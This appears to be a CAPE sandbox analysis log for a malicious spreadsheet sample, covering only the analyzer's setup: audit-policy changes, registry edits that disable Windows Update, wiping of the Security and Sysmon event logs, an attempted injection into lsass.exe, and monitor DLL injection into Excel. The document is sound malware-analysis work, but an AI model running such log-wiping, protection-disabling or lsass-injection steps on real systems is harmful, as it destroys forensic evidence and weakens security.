Analysis Report · ACUBE Sandbox

Analysis

Category	Package	Started	Completed	Duration	Options	Log(s)	MalScore
FILE	xls	2025-12-09 15:09:42	2025-12-09 15:13:07	205 seconds	Show Options	Show Analysis Log	10.0

vnc_port=5900

2025-12-06 18:05:29,745 [root] INFO: Date set to: 20251209T07:09:37, timeout set to: 180
2025-12-06 18:05:29,745 [root] DEBUG: Starting analyzer from: C:\tmpodgh_435
2025-12-06 18:05:29,745 [root] DEBUG: Storing results at: C:\obthVYLcwy
2025-12-06 18:05:29,745 [root] DEBUG: Pipe server name: \\.\PIPE\qUjtiY
2025-12-06 18:05:29,745 [root] DEBUG: Python path: C:\Python38
2025-12-06 18:05:29,745 [root] INFO: analysis running as a normal user
2025-12-06 18:05:29,745 [root] INFO: analysis package specified: "xls"
2025-12-06 18:05:29,745 [root] DEBUG: importing analysis package module: "modules.packages.xls"...
2025-12-06 18:05:29,745 [root] DEBUG: imported analysis package "xls"
2025-12-06 18:05:29,745 [root] DEBUG: initializing analysis package "xls"...
2025-12-06 18:05:29,745 [lib.common.common] INFO: wrapping
2025-12-06 18:05:29,745 [lib.core.compound] ERROR: Unable to create user-defined custom folder directory
2025-12-06 18:05:29,745 [root] DEBUG: New location of moved file: C:\Users\user\AppData\Local\Temp\26bd031cb4a5333bbd77.xls
2025-12-06 18:05:29,745 [root] INFO: Analyzer: Package modules.packages.xls does not specify a DLL option
2025-12-06 18:05:29,745 [root] INFO: Analyzer: Package modules.packages.xls does not specify a DLL_64 option
2025-12-06 18:05:29,745 [root] INFO: Analyzer: Package modules.packages.xls does not specify a loader option
2025-12-06 18:05:29,745 [root] INFO: Analyzer: Package modules.packages.xls does not specify a loader_64 option
2025-12-06 18:05:29,777 [root] DEBUG: Imported auxiliary module "modules.auxiliary.browser"
2025-12-06 18:05:29,777 [root] DEBUG: Imported auxiliary module "modules.auxiliary.curtain"
2025-12-06 18:05:29,777 [root] DEBUG: Imported auxiliary module "modules.auxiliary.disguise"
2025-12-06 18:05:29,777 [root] DEBUG: Imported auxiliary module "modules.auxiliary.during_script"
2025-12-06 18:05:29,777 [root] DEBUG: Imported auxiliary module "modules.auxiliary.end_noisy_tasks"
2025-12-06 18:05:29,777 [root] DEBUG: Imported auxiliary module "modules.auxiliary.evtx"
2025-12-06 18:05:29,792 [root] DEBUG: Imported auxiliary module "modules.auxiliary.human"
2025-12-06 18:05:29,792 [root] DEBUG: Imported auxiliary module "modules.auxiliary.pre_script"
2025-12-06 18:05:29,792 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageChops'
2025-12-06 18:05:29,808 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageGrab'
2025-12-06 18:05:29,808 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageDraw'
2025-12-06 18:05:29,808 [root] DEBUG: Imported auxiliary module "modules.auxiliary.screenshots"
2025-12-06 18:05:29,824 [root] DEBUG: Imported auxiliary module "modules.auxiliary.sysmon"
2025-12-06 18:05:29,824 [root] DEBUG: Imported auxiliary module "modules.auxiliary.tlsdump"
2025-12-06 18:05:29,839 [root] DEBUG: Imported auxiliary module "modules.auxiliary.usage"
2025-12-06 18:05:29,839 [root] DEBUG: Initialized auxiliary module "Browser"
2025-12-06 18:05:29,839 [root] DEBUG: attempting to configure 'Browser' from data
2025-12-06 18:05:29,839 [root] DEBUG: module Browser does not support data configuration, ignoring
2025-12-06 18:05:29,839 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.browser"...
2025-12-06 18:05:29,839 [root] DEBUG: Started auxiliary module modules.auxiliary.browser
2025-12-06 18:05:29,839 [root] DEBUG: Initialized auxiliary module "Curtain"
2025-12-06 18:05:29,839 [root] DEBUG: attempting to configure 'Curtain' from data
2025-12-06 18:05:29,839 [root] DEBUG: module Curtain does not support data configuration, ignoring
2025-12-06 18:05:29,839 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.curtain"...
2025-12-06 18:05:29,839 [root] DEBUG: Started auxiliary module modules.auxiliary.curtain
2025-12-06 18:05:29,839 [root] DEBUG: Initialized auxiliary module "Disguise"
2025-12-06 18:05:29,839 [root] DEBUG: attempting to configure 'Disguise' from data
2025-12-06 18:05:29,839 [root] DEBUG: module Disguise does not support data configuration, ignoring
2025-12-06 18:05:29,839 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.disguise"...
2025-12-06 18:05:29,839 [root] WARNING: Cannot execute auxiliary module modules.auxiliary.disguise: [WinError 5] Access is denied
2025-12-06 18:05:29,839 [root] DEBUG: Initialized auxiliary module "End_noisy_tasks"
2025-12-06 18:05:29,839 [root] DEBUG: attempting to configure 'End_noisy_tasks' from data
2025-12-06 18:05:29,839 [root] DEBUG: module End_noisy_tasks does not support data configuration, ignoring
2025-12-06 18:05:29,839 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.end_noisy_tasks"...
2025-12-06 18:05:29,839 [modules.auxiliary.end_noisy_tasks] DEBUG: taskkill /f /IM wuauclt.exe
2025-12-06 18:05:29,839 [root] DEBUG: Started auxiliary module modules.auxiliary.end_noisy_tasks
2025-12-06 18:05:29,839 [root] DEBUG: Initialized auxiliary module "Evtx"
2025-12-06 18:05:29,839 [root] DEBUG: attempting to configure 'Evtx' from data
2025-12-06 18:05:29,839 [root] DEBUG: module Evtx does not support data configuration, ignoring
2025-12-06 18:05:29,839 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.evtx"...
2025-12-06 18:05:29,839 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Security State Change" /success:enable /failure:enable
2025-12-06 18:05:29,839 [root] DEBUG: Started auxiliary module modules.auxiliary.evtx
2025-12-06 18:05:29,839 [root] DEBUG: Initialized auxiliary module "Human"
2025-12-06 18:05:29,839 [root] DEBUG: attempting to configure 'Human' from data
2025-12-06 18:05:29,839 [root] DEBUG: module Human does not support data configuration, ignoring
2025-12-06 18:05:29,839 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.human"...
2025-12-06 18:05:29,839 [root] DEBUG: Started auxiliary module modules.auxiliary.human
2025-12-06 18:05:29,839 [root] DEBUG: Initialized auxiliary module "Pre_script"
2025-12-06 18:05:29,839 [root] DEBUG: attempting to configure 'Pre_script' from data
2025-12-06 18:05:29,839 [root] DEBUG: module Pre_script does not support data configuration, ignoring
2025-12-06 18:05:29,839 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.pre_script"...
2025-12-06 18:05:29,839 [root] DEBUG: Started auxiliary module modules.auxiliary.pre_script
2025-12-06 18:05:29,839 [root] DEBUG: Initialized auxiliary module "Screenshots"
2025-12-06 18:05:29,839 [root] DEBUG: attempting to configure 'Screenshots' from data
2025-12-06 18:05:29,839 [root] DEBUG: module Screenshots does not support data configuration, ignoring
2025-12-06 18:05:29,839 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.screenshots"...
2025-12-06 18:05:29,839 [root] DEBUG: Started auxiliary module modules.auxiliary.screenshots
2025-12-06 18:05:29,839 [root] DEBUG: Initialized auxiliary module "Sysmon"
2025-12-06 18:05:29,839 [root] DEBUG: attempting to configure 'Sysmon' from data
2025-12-06 18:05:29,839 [root] DEBUG: module Sysmon does not support data configuration, ignoring
2025-12-06 18:05:29,839 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.sysmon"...
2025-12-06 18:05:29,918 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Security System Extension" /success:enable /failure:enable
2025-12-06 18:05:29,980 [root] WARNING: Cannot execute auxiliary module modules.auxiliary.sysmon: In order to use the Sysmon functionality, it is required to have the SMaster(64|32).exe file and sysmonconfig-export.xml file in the bin path. Note that the SMaster(64|32).exe files are just the standard Sysmon binaries renamed to avoid anti-analysis detection techniques.
2025-12-06 18:05:29,980 [root] DEBUG: Initialized auxiliary module "TLSDumpMasterSecrets"
2025-12-06 18:05:29,980 [root] DEBUG: attempting to configure 'TLSDumpMasterSecrets' from data
2025-12-06 18:05:29,980 [root] DEBUG: module TLSDumpMasterSecrets does not support data configuration, ignoring
2025-12-06 18:05:29,980 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.tlsdump"...
2025-12-06 18:05:29,980 [modules.auxiliary.end_noisy_tasks] DEBUG: taskkill /f /IM wusa.exe
2025-12-06 18:05:29,980 [modules.auxiliary.tlsdump] INFO: lsass.exe found, pid 672
2025-12-06 18:05:29,980 [lib.api.process] WARNING: failed to open process 672
2025-12-06 18:05:29,980 [lib.api.process] WARNING: failed to open process 672
2025-12-06 18:05:29,980 [lib.api.process] WARNING: failed to open process 672
2025-12-06 18:05:29,980 [lib.api.process] DEBUG: Failed getting image name for pid 672
2025-12-06 18:05:29,980 [lib.api.process] WARNING: failed to open process 672
2025-12-06 18:05:29,980 [lib.api.process] DEBUG: Failed getting image name for pid 672
2025-12-06 18:05:29,980 [lib.api.process] DEBUG: Failed getting exit code for <Process 672 ???>
2025-12-06 18:05:29,980 [lib.api.process] WARNING: failed to open process 672
2025-12-06 18:05:29,980 [lib.api.process] DEBUG: Failed getting image name for pid 672
2025-12-06 18:05:29,980 [lib.api.process] WARNING: failed to open process 672
2025-12-06 18:05:29,980 [lib.api.process] DEBUG: Failed getting image name for pid 672
2025-12-06 18:05:29,980 [lib.api.process] WARNING: the <Process 672 ???> is not alive, injection aborted
2025-12-06 18:05:29,980 [root] DEBUG: Started auxiliary module modules.auxiliary.tlsdump
2025-12-06 18:05:29,980 [root] DEBUG: Initialized auxiliary module "Usage"
2025-12-06 18:05:29,980 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"System Integrity" /success:enable /failure:enable
2025-12-06 18:05:29,980 [root] DEBUG: attempting to configure 'Usage' from data
2025-12-06 18:05:29,980 [root] DEBUG: module Usage does not support data configuration, ignoring
2025-12-06 18:05:29,980 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.usage"...
2025-12-06 18:05:29,980 [root] DEBUG: Started auxiliary module modules.auxiliary.usage
2025-12-06 18:05:29,980 [root] DEBUG: Initialized auxiliary module "During_script"
2025-12-06 18:05:29,980 [root] DEBUG: attempting to configure 'During_script' from data
2025-12-06 18:05:29,980 [root] DEBUG: module During_script does not support data configuration, ignoring
2025-12-06 18:05:29,980 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.during_script"...
2025-12-06 18:05:29,980 [root] DEBUG: Started auxiliary module modules.auxiliary.during_script
2025-12-06 18:05:30,027 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"IPsec Driver" /success:disable /failure:disable
2025-12-06 18:05:30,058 [modules.auxiliary.end_noisy_tasks] DEBUG: taskkill /f /IM WindowsUpdate.exe
2025-12-06 18:05:30,074 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Other System Events" /success:disable /failure:enable
2025-12-06 18:05:30,120 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Logon" /success:enable /failure:enable
2025-12-06 18:05:30,120 [modules.auxiliary.end_noisy_tasks] DEBUG: taskkill /f /IM GoogleUpdate.exe
2025-12-06 18:05:30,152 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Logoff" /success:enable /failure:enable
2025-12-06 18:05:30,183 [modules.auxiliary.end_noisy_tasks] DEBUG: taskkill /f /IM MicrosoftEdgeUpdate.exe
2025-12-06 18:05:30,199 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Account Lockout" /success:enable /failure:enable
2025-12-06 18:05:30,214 [root] INFO: Restarting WMI Service
2025-12-06 18:05:30,230 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"IPsec Main Mode" /success:disable /failure:disable
2025-12-06 18:05:30,246 [root] DEBUG: package modules.packages.xls does not support configure, ignoring
2025-12-06 18:05:30,261 [root] WARNING: configuration error for package modules.packages.xls: error importing data.packages.xls: No module named 'data.packages'
2025-12-06 18:05:30,261 [lib.core.compound] INFO: C:\Users\user\AppData\Local\Temp already exists, skipping creation
2025-12-06 18:05:30,261 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"IPsec Quick Mode" /success:disable /failure:disable
2025-12-06 18:05:30,292 [modules.auxiliary.end_noisy_tasks] DEBUG: Command executed with exit code 1: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v DisableWindowsUpdateAccess /t REG_DWORD /d 1 /f
2025-12-06 18:05:30,308 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"IPsec Extended Mode" /success:disable /failure:disable
2025-12-06 18:05:30,339 [modules.auxiliary.end_noisy_tasks] DEBUG: Command executed with exit code 1: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\DataCollection" /v AllowTelemetry /t REG_DWORD /d 0 /f
2025-12-06 18:05:30,339 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Other Logon/Logoff Events" /success:enable /failure:enable
2025-12-06 18:05:30,386 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Network Policy Server" /success:enable /failure:enable
2025-12-06 18:05:30,386 [modules.auxiliary.end_noisy_tasks] DEBUG: Command executed with exit code 1: reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v EnableICMPRedirect /t REG_DWORD /d 0 /f
2025-12-06 18:05:30,417 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Special Logon" /success:enable /failure:enable
2025-12-06 18:05:30,448 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"File System" /success:enable /failure:enable
2025-12-06 18:05:30,480 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Registry" /success:enable /failure:enable
2025-12-06 18:05:30,511 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Kernel Object" /success:enable /failure:enable
2025-12-06 18:05:30,526 [lib.api.process] INFO: Successfully executed process from path "C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE" with arguments ""C:\Users\user\AppData\Local\Temp\26bd031cb4a5333bbd77.xls" /dde" with pid 3476
2025-12-06 18:05:30,526 [lib.api.process] INFO: Monitor config for <Process 3476 EXCEL.EXE>: C:\tmpodgh_435\dll\3476.ini
2025-12-06 18:05:30,526 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmpodgh_435\dll\uEkYutNh.dll, loader C:\tmpodgh_435\bin\excVWoS.exe
2025-12-06 18:05:30,526 [root] DEBUG: Loader: Injecting process 3476 (thread 4524) with C:\tmpodgh_435\dll\uEkYutNh.dll.
2025-12-06 18:05:30,526 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2025-12-06 18:05:30,526 [root] DEBUG: Successfully injected DLL C:\tmpodgh_435\dll\uEkYutNh.dll.
2025-12-06 18:05:30,526 [lib.api.process] INFO: Injected into 32-bit <Process 3476 EXCEL.EXE>
2025-12-06 18:05:30,542 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"SAM" /success:disable /failure:disable
2025-12-06 18:05:30,558 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Certification Services" /success:enable /failure:enable
2025-12-06 18:05:30,589 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Handle Manipulation" /success:disable /failure:disable
2025-12-06 18:05:30,620 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Application Generated" /success:enable /failure:enable
2025-12-06 18:05:30,651 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"File Share" /success:enable /failure:enable
2025-12-06 18:05:30,667 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Filtering Platform Packet Drop" /success:disable /failure:disable
2025-12-06 18:05:30,698 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Filtering Platform Connection" /success:disable /failure:disable
2025-12-06 18:05:30,730 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Other Object Access Events" /success:disable /failure:disable
2025-12-06 18:05:30,761 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Sensitive Privilege Use" /success:disable /failure:disable
2025-12-06 18:05:30,777 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Non Sensitive Privilege Use" /success:disable /failure:disable
2025-12-06 18:05:30,808 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Other Privilege Use Events" /success:disable /failure:disable
2025-12-06 18:05:30,839 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"RPC Events" /success:enable /failure:enable
2025-12-06 18:05:30,870 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Audit Policy Change" /success:enable /failure:enable
2025-12-06 18:05:30,886 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Authentication Policy Change" /success:enable /failure:enable
2025-12-06 18:05:30,917 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"MPSSVC Rule-Level Policy Change" /success:disable /failure:disable
2025-12-06 18:05:30,948 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Filtering Platform Policy Change" /success:disable /failure:disable
2025-12-06 18:05:30,980 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Other Policy Change Events" /success:disable /failure:enable
2025-12-06 18:05:31,011 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"User Account Management" /success:enable /failure:enable
2025-12-06 18:05:31,027 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Computer Account Management" /success:enable /failure:enable
2025-12-06 18:05:31,058 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Security Group Management" /success:enable /failure:enable
2025-12-06 18:05:31,089 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Distribution Group Management" /success:enable /failure:enable
2025-12-06 18:05:31,105 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Application Group Management" /success:enable /failure:enable
2025-12-06 18:05:31,136 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Other Account Management Events" /success:enable /failure:enable
2025-12-06 18:05:31,167 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Directory Service Access" /success:enable /failure:enable
2025-12-06 18:05:31,199 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Directory Service Changes" /success:enable /failure:enable
2025-12-06 18:05:31,230 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Directory Service Replication" /success:disable /failure:enable
2025-12-06 18:05:31,245 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Detailed Directory Service Replication" /success:disable /failure:disable
2025-12-06 18:05:31,277 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Credential Validation" /success:enable /failure:enable
2025-12-06 18:05:31,308 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Kerberos Service Ticket Operations" /success:enable /failure:enable
2025-12-06 18:05:31,339 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Other Account Logon Events" /success:enable /failure:enable
2025-12-06 18:05:31,355 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Kerberos Authentication Service" /success:enable /failure:enable
2025-12-06 18:05:31,386 [modules.auxiliary.evtx] DEBUG: Wiping Application
2025-12-06 18:05:31,417 [modules.auxiliary.evtx] DEBUG: Wiping HardwareEvents
2025-12-06 18:05:31,449 [modules.auxiliary.evtx] DEBUG: Wiping Internet Explorer
2025-12-06 18:05:31,464 [modules.auxiliary.evtx] DEBUG: Wiping Key Management Service
2025-12-06 18:05:31,495 [modules.auxiliary.evtx] DEBUG: Wiping OAlerts
2025-12-06 18:05:31,527 [modules.auxiliary.evtx] DEBUG: Wiping Security
2025-12-06 18:05:31,542 [modules.auxiliary.evtx] DEBUG: Wiping Setup
2025-12-06 18:05:31,574 [modules.auxiliary.evtx] DEBUG: Wiping System
2025-12-06 18:05:31,605 [modules.auxiliary.evtx] DEBUG: Wiping Windows PowerShell
2025-12-06 18:05:31,621 [modules.auxiliary.evtx] DEBUG: Wiping Microsoft-Windows-Sysmon/Operational
2025-12-06 18:05:32,542 [lib.api.process] INFO: Successfully resumed <Process 3476 EXCEL.EXE>
2025-12-06 18:05:32,589 [root] DEBUG: 3476: Python path set to 'C:\Python38'.
2025-12-06 18:05:32,589 [root] INFO: Disabling sleep skipping.
2025-12-06 18:05:32,589 [root] DEBUG: 3476: Dropped file limit defaulting to 100.
2025-12-06 18:05:32,667 [root] DEBUG: 3476: Microsoft Office settings enabled.
2025-12-06 18:05:32,667 [root] DEBUG: Error 5 (0x5) - AmsiDumper: Is CAPE agent running elevated? Initialisation failed: Access is denied.
2025-12-06 18:05:32,667 [root] DEBUG: 3476: Monitor initialised: 32-bit capemon loaded in process 3476 at 0x73cb0000, thread 4524, image base 0x2e0000, stack from 0x3935000-0x3940000
2025-12-06 18:05:32,667 [root] DEBUG: 3476: Commandline: "C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE" "C:\Users\user\AppData\Local\Temp\26bd031cb4a5333bbd77.xls" /dde
2025-12-06 18:05:32,667 [root] DEBUG: 3476: hook_api: Warning - CoCreateInstance export address 0x7595569D differs from GetProcAddress -> 0x75E595D0 (combase.dll::0xd95d0)
2025-12-06 18:05:32,667 [root] DEBUG: 3476: hook_api: Warning - CoCreateInstanceEx export address 0x759556DC differs from GetProcAddress -> 0x75E3C540 (combase.dll::0xbc540)
2025-12-06 18:05:32,667 [root] DEBUG: 3476: hook_api: Warning - CoGetClassObject export address 0x75955C6C differs from GetProcAddress -> 0x75E251A0 (combase.dll::0xa51a0)
2025-12-06 18:05:32,667 [root] DEBUG: 3476: hook_api: Warning - CreateRemoteThreadEx export address 0x76FC866C differs from GetProcAddress -> 0x774C7630 (KERNELBASE.dll::0x137630)
2025-12-06 18:05:32,667 [root] DEBUG: 3476: hook_api: Warning - CLSIDFromProgID export address 0x75954ED6 differs from GetProcAddress -> 0x75DF16A0 (combase.dll::0x716a0)
2025-12-06 18:05:32,667 [root] DEBUG: 3476: hook_api: Warning - CLSIDFromProgIDEx export address 0x75954F13 differs from GetProcAddress -> 0x75DF0500 (combase.dll::0x70500)
2025-12-06 18:05:32,667 [root] DEBUG: 3476: Hooked 434 out of 434 functions
2025-12-06 18:05:32,667 [root] DEBUG: 3476: Syscall hook installed, syscall logging level 1
2025-12-06 18:05:32,667 [root] DEBUG: 3476: WoW64fix: Windows version 10.0 not supported.
2025-12-06 18:05:32,667 [root] INFO: Loaded monitor into process with pid 3476
2025-12-06 18:05:33,011 [root] DEBUG: 3476: DLL loaded at 0x75770000: C:\Windows\System32\oleaut32 (0x96000 bytes).
2025-12-06 18:05:33,058 [root] DEBUG: 3476: DLL loaded at 0x742E0000: C:\Windows\SYSTEM32\CRYPTUI (0x3f000 bytes).
2025-12-06 18:05:33,058 [root] DEBUG: 3476: DLL loaded at 0x75440000: C:\Windows\SYSTEM32\IPHLPAPI (0x33000 bytes).
2025-12-06 18:05:33,058 [root] DEBUG: 3476: DLL loaded at 0x72E90000: C:\Program Files (x86)\Common Files\Microsoft Shared\Office16\mso20win32client (0x68a000 bytes).
2025-12-06 18:05:33,105 [root] DEBUG: 3476: DLL loaded at 0x74290000: C:\Windows\SYSTEM32\wevtapi (0x49000 bytes).
2025-12-06 18:05:33,105 [root] DEBUG: 3476: DLL loaded at 0x723B0000: C:\Program Files (x86)\Common Files\Microsoft Shared\Office16\mso30win32client (0xadc000 bytes).
2025-12-06 18:05:33,167 [root] DEBUG: 3476: DLL loaded at 0x71520000: C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.19041.2251_none_d9513b1fe1046fc7\gdiplus (0x167000 bytes).
2025-12-06 18:05:33,167 [root] DEBUG: 3476: DLL loaded at 0x71690000: C:\Program Files (x86)\Common Files\Microsoft Shared\Office16\mso40uiwin32client (0xd1e000 bytes).
2025-12-06 18:05:33,183 [root] DEBUG: 3476: DLL loaded at 0x71430000: C:\Program Files (x86)\Common Files\Microsoft Shared\Office16\mso50win32client (0xef000 bytes).
2025-12-06 18:05:33,277 [root] DEBUG: 3476: DLL loaded at 0x74280000: C:\Windows\SYSTEM32\HTTPAPI (0xb000 bytes).
2025-12-06 18:05:33,277 [root] DEBUG: 3476: DLL loaded at 0x6FF50000: C:\Windows\SYSTEM32\PROPSYS (0xc2000 bytes).
2025-12-06 18:05:33,293 [root] DEBUG: 3476: DLL loaded at 0x74240000: C:\Windows\SYSTEM32\WTSAPI32 (0xf000 bytes).
2025-12-06 18:05:33,293 [root] DEBUG: 3476: DLL loaded at 0x70020000: C:\Program Files (x86)\Common Files\Microsoft Shared\Office16\mso98win32client (0x1407000 bytes).
2025-12-06 18:05:33,417 [root] DEBUG: 3476: DLL loaded at 0x084F0000: C:\Program Files (x86)\Common Files\Microsoft Shared\Office16\mso (0x1cc1000 bytes).
2025-12-06 18:05:33,417 [root] DEBUG: 3476: DLL loaded at 0x77020000: C:\Windows\System32\bcryptPrimitives (0x5f000 bytes).
2025-12-06 18:05:33,448 [root] DEBUG: 3476: DLL loaded at 0x6DFE0000: C:\Windows\SYSTEM32\msi (0x298000 bytes).
2025-12-06 18:05:33,464 [root] DEBUG: 3476: DLL loaded at 0x6DDD0000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.1110_none_a8625c1886757984\Comctl32 (0x210000 bytes).
2025-12-06 18:05:33,464 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\{D97DA1AE-2C1A-4825-BB08-AB4D047678BC} - OProcSessId.dat
2025-12-06 18:05:33,495 [root] DEBUG: 3476: DLL loaded at 0x6D8B0000: C:\Windows\SYSTEM32\d2d1 (0x515000 bytes).
2025-12-06 18:05:33,495 [root] DEBUG: 3476: DLL loaded at 0x750B0000: C:\Windows\system32\uxtheme (0x74000 bytes).
2025-12-06 18:05:33,511 [root] DEBUG: 3476: DLL loaded at 0x76E50000: C:\Windows\System32\MSCTF (0xd4000 bytes).
2025-12-06 18:05:33,511 [root] DEBUG: 3476: DLL loaded at 0x73920000: C:\Windows\SYSTEM32\WINSTA (0x4e000 bytes).
2025-12-06 18:05:33,511 [root] DEBUG: 3476: DLL loaded at 0x6D7E0000: C:\Windows\SYSTEM32\dxgi (0xc2000 bytes).
2025-12-06 18:05:33,526 [root] DEBUG: 3476: DLL loaded at 0x74230000: C:\Windows\SYSTEM32\resourcepolicyclient (0xf000 bytes).
2025-12-06 18:05:33,526 [root] DEBUG: 3476: set_hooks_by_export_directory: Hooked 0 out of 434 functions
2025-12-06 18:05:33,526 [root] DEBUG: 3476: DLL loaded at 0x75290000: C:\Windows\SYSTEM32\kernel.appcore (0xf000 bytes).
2025-12-06 18:05:33,542 [root] DEBUG: 3476: DLL loaded at 0x752A0000: C:\Windows\SYSTEM32\VERSION (0x8000 bytes).
2025-12-06 18:05:33,558 [root] DEBUG: 3476: DLL loaded at 0x73890000: C:\Windows\SYSTEM32\POWRPROF (0x44000 bytes).
2025-12-06 18:05:33,558 [root] DEBUG: 3476: DLL loaded at 0x74230000: C:\Windows\SYSTEM32\UMPDC (0xd000 bytes).
2025-12-06 18:05:33,589 [root] DEBUG: 3476: DLL loaded at 0x6D600000: C:\Windows\SYSTEM32\d3d11 (0x1e0000 bytes).
2025-12-06 18:05:33,589 [root] DEBUG: 3476: DLL loaded at 0x75810000: C:\Windows\System32\shcore (0x87000 bytes).
2025-12-06 18:05:33,620 [root] DEBUG: 3476: DLL loaded at 0x6D030000: C:\Windows\SYSTEM32\d3d10warp (0x5c2000 bytes).
2025-12-06 18:05:33,620 [root] DEBUG: 3476: DLL loaded at 0x76080000: C:\Windows\System32\cfgmgr32 (0x3b000 bytes).
2025-12-06 18:05:33,620 [root] DEBUG: 3476: DLL loaded at 0x73860000: C:\Windows\SYSTEM32\dxcore (0x2c000 bytes).
2025-12-06 18:05:33,636 [root] DEBUG: 3476: DLL loaded at 0x74A50000: C:\Windows\SYSTEM32\Wldp (0x25000 bytes).
2025-12-06 18:05:33,636 [root] DEBUG: 3476: DLL loaded at 0x74A80000: C:\Windows\SYSTEM32\windows.storage (0x60d000 bytes).
2025-12-06 18:05:33,636 [root] DEBUG: 3476: DLL loaded at 0x73840000: C:\Windows\SYSTEM32\profapi (0x18000 bytes).
2025-12-06 18:05:33,651 [root] DEBUG: 3476: DLL loaded at 0x73910000: C:\Windows\SYSTEM32\Secur32 (0xa000 bytes).
2025-12-06 18:05:33,667 [root] DEBUG: 3476: DLL loaded at 0x77310000: C:\Windows\System32\clbcatq (0x7e000 bytes).
2025-12-06 18:05:33,667 [root] DEBUG: 3476: DLL loaded at 0x6CE20000: C:\Windows\SYSTEM32\DWrite (0x20c000 bytes).
